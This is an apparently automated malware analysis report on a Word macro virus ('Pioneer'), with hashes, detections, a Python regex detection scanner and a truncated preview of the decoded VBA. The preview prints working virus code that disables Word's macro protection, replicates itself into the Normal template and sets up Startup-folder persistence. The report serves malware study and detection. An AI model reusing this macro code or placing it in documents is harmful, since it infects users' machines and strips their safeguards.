Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4be61157efe87d20…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 58.0 KB
Created: 2000-03-06 16:40:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 74f7fb3e2f3f53a060948c73f6ea874d
SHA-1: c8a43260f3093b8db5574c9d5209f495d22dbc1e
SHA-256: 4be61157efe87d20f94ec3dbd60c20405350972e88d45956241266ae6b666b6f
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The heuristics flag an Auto_Close macro, a common entry point for running code when the document is closed; the Auto_Close procedure itself lies beyond the truncated preview below. The visible Pioneer module is padded with junk assignments to undefined variables and random numbers, sets Options.VirusProtection, Options.ConfirmConversions and Options.SaveNormalPrompt to False to silence Word's macro warning and Normal-template save prompt, exports its own VBA component to 'c:\Pioneer.sys', and then checks whether a component named 'Pioneer' already exists in the active document's VBProject and in the Normal template's VBProject, selecting the VBComponents collection of whichever one lacks it. Exporting its own module and copying it between document and Normal template is the propagation pattern of a self-replicating Word macro virus, not of a downloader: the recovered preview contains no network or download primitive. When the Normal template is read-only (or read-only plus archive) on English (United States) Windows, the macro also calls vTagSR with the path 'c:\windows\startm~1\programs\startup\msfile.bat', a Startup-folder persistence location; the body of vTagSR is not in the preview. ClamAV detects the document as Win.Trojan.Pivis-2 and the extracted macro as Doc.Trojan.VMPCK1-10, which agrees with this assessment.

Heuristics (4)

  • ClamAV: Win.Trojan.Pivis-2 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro (high) OLE_VBA_AUTOCLOSE
    Document contains an Auto_Close macro, an entry point that Word runs automatically when the document is closed
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (This is the rule's canned description; for this sample a VBA project was in fact recovered, see the extracted macros.bas below.)
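The indicator classes that the summary and the heuristics above rely on (auto-exec entry points, macro-protection tampering, self-export of the VBA project, Normal template checks, Startup-folder paths, and the fetch/execute primitives a genuine downloader would need) can be re-derived from the decoded macro text with a small regex scanner. The following Python is an added example written for this page, not part of the analysis pipeline or of the sample; it needs no oletools and takes the decoded VBA source (for instance olevba's output) as a string. The embedded SAMPLE_VBA is constructed: its first block copies lines of the Pioneer module from the preview below, while the Auto_Close stub at the end is an assumption standing in for the entry point the heuristic flagged but the truncated preview does not show. Rule names, tag names and the helper functions (scan_vba, rule_counts, classify) are this example's own.

```python
"""Regex triage of a decoded VBA module for the indicator classes this report uses."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the first block reproduces lines of the decoded "Pioneer"
# module shown in this report; the Auto_Close stub at the end is an assumption
# (the report's heuristic flags an Auto_Close macro, but the truncated preview
# does not include it).
SAMPLE_VBA = r"""Attribute VB_Name = "Pioneer"
Public Skip As Integer
Sub Pioneer()
' England Beamzket Naro Naro
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("Pioneer").Export "c:\Pioneer.sys"
 f6488$ = "c:\windows\startm~1\programs\startup\msfile.bat"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Pioneer" Then VtietagSR19151 = True
Next I
End Sub
' Assumed entry point (not in the preview): hands control to Pioneer on close.
Sub Auto_Close()
Call Pioneer
End Sub
"""

# Rule table: name -> pattern applied to one logical VBA line at a time.
RULES = {
    # Word (AutoOpen...) and Excel (Auto_Open...) spellings plus Document_* events.
    "AUTO_EXEC": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
        r"(?:Auto_?Open|Auto_?Close|Auto_?Exec|Auto_?New|Auto_?Exit|"
        r"Document_Open|Document_Close|Document_New|Workbook_Open)\b", re.I),
    "VIRUS_PROTECTION_OFF": re.compile(r"Options\.VirusProtection\s*=\s*False", re.I),
    "NORMAL_PROMPT_OFF": re.compile(r"Options\.SaveNormalPrompt\s*=\s*False", re.I),
    "ON_ERROR_RESUME": re.compile(r"On\s+Error\s+Resume\s+Next", re.I),
    # Writing a VBComponent to disk is the first half of macro-virus replication.
    "VBPROJECT_EXPORT": re.compile(r"VBComponents\s*\([^)]*\)\s*\.Export\b", re.I),
    "NORMAL_TEMPLATE_VBPROJECT": re.compile(r"NormalTemplate\.VBProject\b", re.I),
    # Startup folder by long name or by the 8.3 short name used in the sample.
    "STARTUP_FOLDER_PATH": re.compile(r"startm~1|\\startup\\", re.I),
    "DOWNLOAD_PRIMITIVE": re.compile(
        r"URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen|Net\.WebClient", re.I),
    "EXEC_PRIMITIVE": re.compile(r"\bShell\s*\(|WScript\.Shell|CreateObject\s*\(", re.I),
}


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    text: str


def scan_vba(source: str) -> List[Finding]:
    """Return every (rule, line, text) hit; whole-line VBA comments are skipped."""
    # Join VBA line continuations (" _" at end of line) so a split statement
    # still matches; reported line numbers then refer to the joined text.
    joined = re.sub(r"[ \t]_\r?\n", " ", source)
    hits: List[Finding] = []
    for line_no, line in enumerate(joined.splitlines(), start=1):
        if line.lstrip().startswith("'"):
            continue
        for rule, pattern in RULES.items():
            if pattern.search(line):
                hits.append(Finding(rule, line_no, line.strip()))
    return hits


def rule_counts(findings: List[Finding]) -> Dict[str, int]:
    """Number of matching lines per rule."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def classify(findings: List[Finding]) -> List[str]:
    """Map rule hits to behaviour tags; the order is fixed so output is stable."""
    rules = {f.rule for f in findings}
    tags: List[str] = []
    if "AUTO_EXEC" in rules:
        tags.append("auto-exec")
    # Export of its own module plus inspection of Normal's VBProject is the
    # replication pattern of a Word macro virus.
    if {"VBPROJECT_EXPORT", "NORMAL_TEMPLATE_VBPROJECT"} <= rules:
        tags.append("self-replicating")
    if "STARTUP_FOLDER_PATH" in rules:
        tags.append("startup-persistence")
    if "VIRUS_PROTECTION_OFF" in rules:
        tags.append("disables-macro-protection")
    # A downloader needs both a fetch and an execute primitive.
    if {"DOWNLOAD_PRIMITIVE", "EXEC_PRIMITIVE"} <= rules:
        tags.append("downloader")
    return tags


if __name__ == "__main__":
    found = scan_vba(SAMPLE_VBA)
    for f in found:
        print(f"{f.rule:26} line {f.line_no:3}: {f.text}")
    print("tags:", classify(found))
```

Run stand-alone it prints each hit and the tag list for SAMPLE_VBA; that list contains self-replicating and startup-persistence but not downloader, which is the distinction the summary draws. The scanner is deliberately line-oriented: it joins VBA line continuations but does not evaluate string-building obfuscation, so a module that assembles these names at runtime from Chr() or Mid() calls would slip past it; treat a miss as "not seen", not "absent".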

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46237 bytes
SHA-256: a87bf2d323674b9abe63916d611aa8cae531acd6a8c2a6c7a81c7db31fec31f9
Detection: ClamAV: Doc.Trojan.VMPCK1-10
Obfuscation or payload: unlikely
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Pioneer"
    
Public Skip As Integer
    
    
Sub Pioneer()
' England Beamzket Naro Naro
On Error Resume Next
Dim angel
Randomize
Randomize
f16923 = u10383 & c14831 & k13034 & m10383
f16923 = m10383 & c14831 & Int(Rnd * 9900)
k2003 = m3089 & e5197
f3746 = m3089 & c3454 & Int(Rnd * 978)
f7091 = u7587 & c7612 & Int(Rnd * 4227)
f7091 = m7587 & c7612 & Int(Rnd * 392)
f12006 = m8985 & c11222 & Int(Rnd * 5146)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("Pioneer").Export "c:\Pioneer.sys"
f8782 = u2853 & c8298 & Int(Rnd * 619)
f8782 = m2853 & c8298 & Int(Rnd * 2829)
f12936 = u5220 & c2956 & Int(Rnd * 2423)
f12936 = m5220 & c2956 & Int(Rnd * 1610)
k12223 = m17101 & e7338
f12472 = m17101 & c7089 & Int(Rnd * 8377)
ActiveDocument.ReadOnlyRecommended = False
k11439 = m9977 & e11880
f10626 = m9977 & c12693 & Int(Rnd * 604)
f5876 = m15783 & c11864 & Int(Rnd * 6340)
f9173 = u11442 & c14476 & k10255 & m11442
f9173 = m11442 & c14476 & Int(Rnd * 2359)
f4900 = u10710 & c18584 & Int(Rnd * 9967)
f4900 = m10710 & c18584 & Int(Rnd * 6481)
f6294 = u15061 & c16184 & k11563 & m15061
f6294 = m15061 & c16184 & Int(Rnd * 6177)
check = Int(Rnd * 1000)
If check = 3 Then Call p1782
f11828 = u16436 & c9370 & Int(Rnd * 5219)
f11828 = m16436 & c9370 & Int(Rnd * 9501)
f14269 = u5389 & c9937 & Int(Rnd * 4257)
f14269 = m5389 & c9937 & Int(Rnd * 2758)
k13474 = m8410 & e13003
f14376 = m8410 & c12101 & Int(Rnd * 4701)
k15689 = m4239 & e5015
f9008 = m4239 & c11696 & Int(Rnd * 1868)
 f6488$ = "c:\windows\startm~1\programs\startup\msfile.bat"
f16638 = u4814 & c817 & k7533 & m4814
f16638 = m4814 & c817 & Int(Rnd * 2313)
f16412 = u3428 & c7419 & Int(Rnd * 7993)
f16412 = m3428 & c7419 & Int(Rnd * 3274)
a17827974 = GetAttr(NormalTemplate.FullName)
f12710 = m3834 & c9557 & Int(Rnd * 2571)
f8769 = m17507 & c9226 & Int(Rnd * 7675)
If a17827974 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vTagSR(f6488$)
f6686 = u13651 & c12362 & Int(Rnd * 757)
f6686 = m13651 & c12362 & Int(Rnd * 5707)
f5604 = m5558 & c6921 & Int(Rnd * 3906)
If a17827974 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vTagSR(f6488$)
k14724 = m9718 & e8669
f16280 = m9718 & c7113 & Int(Rnd * 1024)
f17387 = u8500 & c10698 & Int(Rnd * 8806)
f17387 = m8500 & c10698 & Int(Rnd * 3132)
If a17827974 = vbReadOnly Then GoTo littlekitty
f15589 = m10214 & c7849 & Int(Rnd * 8752)
k752 = m11781 & e9530
f1841 = m11781 & c8441 & Int(Rnd * 4655)
If a17827974 = vbReadOnly + vbArchive Then GoTo littlekitty
f8709 = u13325 & c8609 & Int(Rnd * 204)
f8709 = m13325 & c8609 & Int(Rnd * 9126)
f3056 = u13584 & c14189 & k10064 & m13584
f3056 = m13584 & c14189 & Int(Rnd * 8706)
f11429 = u9647 & c3706 & Int(Rnd * 2633)
f11429 = m9647 & c3706 & Int(Rnd * 893)
f5013 = m10876 & c10333 & Int(Rnd * 4499)
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Pioneer" Then qq797419157 = True
Next I
f9882 = m13434 & c12396 & Int(Rnd * 5858)
f5655 = u11540 & c8051 & Int(Rnd * 4852)
f5655 = m11540 & c8051 & Int(Rnd * 3375)
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Pioneer" Then VtietagSR19151 = True
Next I
k12871 = m8024 & e18520
f16239 = m8024 & c15152 & Int(Rnd * 3704)
f7156 = u8914 & c7814 & Int(Rnd * 3289)
f7156 = m8914 & c7814 & Int(Rnd * 5014)
If qq797419157 = True And VtietagSR19151 = False Then Set t1915797410 = NormalTemplate.VBProject.VBComponents
If qq797419157 = False And VtietagSR19151 = True Then Set t19
... (truncated)